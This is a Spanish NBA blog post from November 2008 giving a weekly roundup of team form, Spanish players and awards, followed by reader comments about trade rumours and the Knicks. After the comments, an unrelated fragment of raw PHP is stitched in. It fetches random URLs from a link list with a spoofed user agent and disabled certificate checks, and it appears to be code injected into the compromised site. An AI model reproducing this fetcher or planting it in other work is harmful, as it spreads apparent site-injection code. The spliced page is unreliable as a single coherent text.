Informe Semanal TJ (semana 1)

03 de November de 2008 por MagicJohnson32

Por TheDeerHunter y MagicJohnson32

Inauguramos sección: este Informe Semanal TJ se encargará de resumir lo acontecido a lo largo de la semana previa, tratando de extraer las claves fundamentales y los jugadores y equipos más en forma, así como los que peor rendimiento están ofreciendo.

Pero dejemos los preámbulos y vayamos a ello:

LAKERS0809ON FIRE:

El equipo que más en forma se ha mostrado ha sido, como muchos esperaban, Los Angeles Lakers, gracias a un gran Kobe y a que todas las piezas están funcionando coherentemente. Destacamos la defensa y la segunda línea. Son terceros en anotación y segunos en defensa. Intratables.

Houston y Hornets ya se presentan temibles. Han incorporado con éxito los fichajes a su buen juego. En el caso de Hornets, incluso en ausencia de piezas fundamentales han mojado la oreja a más de un gallito.

Toronto, muy bien con sus dos torres funcionando y Calderón dirigiendo. Inmaculados pero con cierta dosis de buena suerte.

En este grupo también incluimos a Utah, con un Boozer ganándose el pan y un buen Kirilenko saliendo desde el banquillo; y a Detroit, jugando a lo suyo e incorporando inteligentemente buenos elementos al proyecto. No obstante, el mejor equipo del Este hasta ahora ha sido Atlanta, y Joe Johnson es el líder entre los pistoleros. Buena manera de empezar su particular carrera, porque ésta no es su guerra.

AL TRAN-TRAN:

Encabeza esta categoría Boston, con clara intención de administrar fuerzas en temporada regular.

Chicago y Rose están funcionando. Candidatura fuerte al RoY.

Aquí incluiríamos también el amplio abanico de equipos que están dando una de cal y una de arena (Suns, Dallas, Bucks, Pacers, Nets o Bobcats) además de los equipos que, sin estar jugando mal, por diferentes circunstancias no han logrado obtener los resultados esperados (Cleveland, Sixers, Portland, Denver o Warriors).

EL BORDE DEL ABISMO:

Orlando Magic ha empezado bastante mal el curso. La derrota contra Indiana, siendo grave por tratarse de un rival para Playoffs, es justificable. No así la de Memphis. Preocupa sobremanera el rendimiento demostrado popovicpor su banquillo, un solar de momento, indigno de un teórico Top 4 del Este.

Miami, Minnesotta y New York tampoco terminan de obtener la mejoría prometida. Los Grizzlies y Thunder ya se pueden dar con un canto en los dientes por haber logrado mojar esta semana. La victoria de estos últimos, por cierto, es la primera de su incipiente historia.

EL POZO:

Los Clippers, horripilantes. No haremos sangre con ellos pero su defensa es de risa. La gran decepción de la semana (y lo que te rondaré morena).

Los Kings, también pésimos. Pero en este caso podía ser más previsible.

Los Spurs, con Duncan y Parker metidos inesperadamente en la parte más alta de la tabla de anotadores, no han sido capaces de inaugurar su casillero de victorias. Esto dice muy poco de la rotación de este año, la peor que se les recuerda. No obstante, entendemos que su paso por esta categoría es circunstancial.

En el caso de los Wizards… bastante tienen con lo que tienen. Al menos están dando la cara en todo momento.

LOS ESPAÑOLES:

Todos en general bastante bien, sin grandes alardes.

marcdwightPau, más agresivo y trabajador que nunca, pero también menos brillante. El papel que debe de asumir, precisamente.

Calderón líder invisible de unos Raptors líderes del Este. Es fantástico ver por fin su nombre en el top de asistentes de la liga. Ese es su hábitat.

Marc está siendo pieza clave en un relativo buen inicio de Memphis. Mejor debutante español de la historia, ahí es nada.

Rudy es fundamental en la rotación de Portland, y hay fe ciega en él incluso cuando no carbura. Comedido.

La mancha es Sergio, que no consigue ganarse su sitio en Portland. Si la cosa sigue igual que en los últimos partidos puede recuperar confianza. Necesita estabilidad, algo que de momento no ha disfrutado.

LAS CONCLUSIONES que extraemos de estos primeros días de competición son…

– Ojo a las dos victorias de prestigio de Atlanta Hawks contra rivales en la lucha por los Playoffs, Orlando y Philadelphia. ¿A quién le ha ganado el Olympiakos esta semana?

abynum– Ya sabemos el precio del anillo de campeones: 14 millones al año. Al menos eso cree Kupchack, que es lo que pagará a Andrew Bynum para garantizarse la presencia del pívot los próximos tres años. Por cierto, con un Bynum discreto, los Lakers han vencido sus tres partidos por una diferencia media de 21,7 puntos. Guau.

– ¿A que no adivinan cuál es el equipo más anotador hasta la fecha? Los Pistons, con 108,5 puntos por partido. Esto, y el 0-2 con el que los Spurs han arrancado, completan el capítulo de las sorpresas. Ahora, lo previsible: Memphis es el equipo menos anotador con unos tristes 81 ppp; y los Rockets presentan la mejor defensa, con sólo 83,3 puntos encajados por noche.

– Atención al rumor: Iverson a cambio de Billups. ¿Qué ha hecho el bueno de Chauncey para merecer esto?

– Me encanta la estadística de eficiencia por 48 minutos. A día de hoy, está liderada por Marreese Speights, con una proyección de 57,4 puntos de eficiencia cada 48 minutos de juego. El primer titular que aparece en la clasificación es Boozer, sexto, con nada menos que 45,12. Pero lo más divertido es ver las últimas posiciones y encontrar, por ejemplo, a Stackhouse con -6,53 seguido por Greg Oden con -7,47. Estoy convencido de que algunos GM vieron esta estadística antes de firmar ciertos contratos.

– Hablando de los Knicks… D’Antoni se ha cargado a Marbury y Curry, algo que no le echaremos en cara. Los Knicks, sin embargo, son aproximadamente el mismo desastre de siempre. ¿Cuándo le llegará el turno a Randolph?

– Thabo Shefolosa era titular con Skiles y ahora es titular con Del Negro. Tras profundas reflexiones en busca de una explicación para que el suizo esté por delante de Gordon y Hinrich, nos surge una pregunta: ¿De quién es hijo este chaval?

Premios TJ, edición semanal:

jjhawksphilliMVP: Su equipo permanece invicto y sus promedios son 30 puntos con un 58% de acierto, además de 5 rebotes y 3,5 asistencias. Joe Johnson está ejerciendo de líder absoluto de los Hawks y merece el premio, aunque también hicieron méritos de sobra Carlos Boozer, Chris Bosh, Chris Paul y Yao.

El rookie: Premio ex aequo para Derrick Rose y Jason Thompson. Rose está siendo el mejor jugador de los Bulls esta temporada (11 puntos, 9 asistencias, 4 rebotes y 3 robos de media) y ha sido esencial en las dos victorias de su equipo, mientras que Thompson está brillando desde el banquillo con una solidez impropia para un debutante (13,3 puntos con 60% de acierto en tiros, además de 7,3 rebotes, en menos de 22 minutos).

La sorpresa: Sorpresa pero menos es Ramon Sessions y lo mucho que mejora a Luke Ridnour. El ex Sonics disputó los dos primeros partidos sin mostrar ningún progreso respecto de su pobre rendimiento en los últimos años. La lesión de Ridnour en la espalda carmelokbdio vía libre a Sessions, que no había disputado ni un minuto hasta entonces, y ha firmado en los dos últimos 15 puntos, 8,5 asistencias, 4,5 rebotes y 2 recuperaciones de media.

La decepción: La lesión de Oden en los primeros minutos de la temporada fue todo un golpe moral para los seguidores de los Blazers. Los problemas físicos de Baron Davis también están frustrando el arranque de temporada del base californiano y, por extensión, el de los Clippers. También decepcionante resultó el debut de Carmelo Anthony, que regresó tras cumplir dos partidos de sanción firmando una gris actuación ante los Lakers.

Y finalizamos con la foto de la semana:

dantoni

Título: “¡Ahí tenéis la **** puerta!”

Argumento: Mike D’Antoni indica gentilmente la salida del Madison Square Garden a unos desorientados Marbury y Curry.

Comenta

20 comentarios a esta entrada

  1. frank dice:
    #1

    Billups por Iverson?. Vamos, los Pistons no creo que aceptaran ese tocomocho.
    Otro rumor, si los Knicks cortan a Marbury tanto Nuggets como Heat parecen de lo mas interesados. La verdad es que tanto unos como otros necesitan un base como el comer.

      Citar

  2. Fran Reyes dice:
    #2

    Me encanta vuestro blog, lo visito cada día para informarme de qué ha sucedido en la NBA. ¡Seguid así!

      Citar

  3. telekoman dice:
    #3

    Dios no. Iverson en Detroit no. Mira que hay miles de mejores oportunidades que esa en el mercado. Vale que a Detroit le vendría bien un cambio, pero Iverson……

      Citar

  4. TheDeerHunter dice:
    #4

    Se trata de un expiring de 21kilos, Teleko…

    ¿no queríais reconstrucción??? pues pasta fresca para buenos agentes libres.
    Podría ser buen movimiento, aunque yo sigo creyendo en ellos.

      Citar

  5. MagicJohnson32 dice:
    #5

    A mí el movimiento me parece francamente bueno para Detroit. Billups ya tiene 32 años y con 35 cobrará más de 13 millones en el 2011.

      Citar

  6. Viva_Dirk dice:
    #6

    Es un buen movimiento para ambos, para Detroit de cara al futuro, ya que esta temporada rompe todo lo que tenía incorporando a un jugador que es la antítesis del espiritu de Detroit, y para Denver de cara a una mejora inmediata.

      Citar

  7. Viva_Dirk dice:
    #7

    Y una cosa que se me olvidaba ¿porque deberia D’Antoni dejar de contar con Randolph?

      Citar

  8. MagicJohnson32 dice:
    #8

    Por lo mismo que ha dejado de contar con Marbury y Curry.

      Citar

  9. Viva_Dirk dice:
    #9

    Y que tiene que ver el rendimiento de Randolph con el de los otros 2? Si Zach en los partidos de NY lo esta haciendo bien y para el juego de D’Antoni tiene buenísimas cualidades.

    No veo el motivo de mover esa pareja Lee-Zach.

      Citar

  10. Jabho dice:
    #10

    Perfecto el análisis. Sólo un matiz. Los mas flojos del arranque a mi juicio son los Kings…. Como no mejoren con la vuelta de Brad les va a caer la del pulpo noche tras noche.

    Lo mejor del arranque Laker es que es la 2ª unidad la que lo comanda. Ya llegará el momento de Pau, Bynum y puede que hasta de Odom.

    C´s al tran tran… así debe ser.

    Mala pinta los Spurs….

      Citar

  11. MagicJohnson32 dice:
    #11

    Pero Viva, ¿cómo puede D’Antoni cargarse a Marbury y Curry por su rendimiento, si ni siquiera han jugado un minuto?

      Citar

  12. TheDeerHunter dice:
    #12

    Los más flojos con los números en la mano hasta ayer (no sé si después de anoche) eran objetivamente Clippers, además de que cualitativamente son un equipo del que se espera mucho más, por lo que el pecado es mayor si cabe.
    Aquí hemos evaluado su actuación la semana pasada, ya veremos que pasa a partir de ahora…

      Citar

  13. Viva_Dirk dice:
    #13

    Y segun tu porque ha prescindido de esos 2?Y que tiene que ver con Zach?

      Citar

  14. MagicJohnson32 dice:
    #14

    Intuyo que ha prescindido de esos dos porque no hacen ningún bien a un equipo que está dispuesto a romper con un lastre de jugadores con contratos obscenos, de dudosa ética profesional y tirando a egoístas en su juego (la herencia que dejó Isaiah, vamos). Randolph cobrará este año 14,6 kilos, el que viene 16 kilos, y en la 2010-2011 más de 17 kilos. ¿Crees que D’Antoni no se lo querría quitar de encima? ¿Tú crees que sigue en los Knicks porque Walsh lo considera intransferible?

      Citar

  15. Pow_Brolin dice:
    #15

    Tildar a Zach cuando siempre ha rendido al maximo nivel ( a pesar de que todo el mundo esta en su contra) de dudosa profesionalidad es por lo menos injusto … contrato obsceno y egosita en su juego mnnnnn como tantos otros.

    Jugadores que te aseguren 10 rebotes y + 15 puntos por partido no hay tantos … de todas formas seguira teniendo mala fama toda su vida y haciendo sus numeros durante varios años.

      Citar

  16. aro_pasado_no_newtoniano dice:
    #16

    Bienvenido contracronistaciclista…

      Citar

  17. Viva_Dirk dice:
    #17

    Estoy con Brolin, Zach esta siempre en el ojo del huracán y al final de cada temporada ha rendido dentro de la cancha, el año pasado con toooooooodos los lios que hubo en NY acabo con 17-10. Creo que si sigue en los Knicks es porque no lo venden a cambio de poco, como se demostró este verano que los Clippers ofrecieron a Eric Gordon+hueco salarial por el y no aceptaron. Es un tio que puede ir muy bien para el juego de D’Antoni y que siempre acaba rindiendo.

    Si hay que echar a gente que cobra mucho para lo que hace, que empiecen por Quentin, Jeffries o James.

      Citar

  18. MagicJohnson32 dice:
    #18

    Sí, claro, el rendimiento de Zach ha sido sensacional estas temporadas, sólo que conforme sus números crecían, su equipo cada vez perdía más partidos. Y cuando los Blazers se lo colocaron a los Knicks, Portland empezó a ganar partidos. Y los Knicks, que estaban hundidos, decubrieron que aún podrían hundirse más.

    He de mirar el balance W / L de Randolph, ha de ser escalofriante.

    Ojo, hace un tiempo que no he visto a Randolph. Tal vez haya cambiado, pero siempre me ha parecido un jugador con talento para hacer números pero un desastre en todo lo demás.

      Citar

  19. TheDeerHunter dice:
    #19

    Al final, han sido nombrados como jugadores de la semana Chris Bosh y Chris Paul.

    A mí me extrañó que al final nosotros nombráramos a Joe Johnson, que por cifras de eficacia (bueno y por todo lo demás) lo merece… pero habiendo nombrado dos veces MVP del día a Chris Bosh pensaba que le ibamos a elegir a él como MVP de la semana.
    Casi diría que Chris Bosh ha sido más importante para el 3-0 de su equipo que Joe Johnson para el 2-0 del suyo (hasta la fecha del informe me refiero)

      Citar

  20. MagicJohnson32 dice:
    #20

    Joe Johnson dobla al segundo máximo anotador de Atlanta, y encima lo hace con unos porcentajes tremendos en un equipo al que en ocasiones le ha costado mucho ver aro.

    Además, precisamente ya que habíamos destacado dos veces a Bosh, pensé que JJ merecía reconocimiento.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>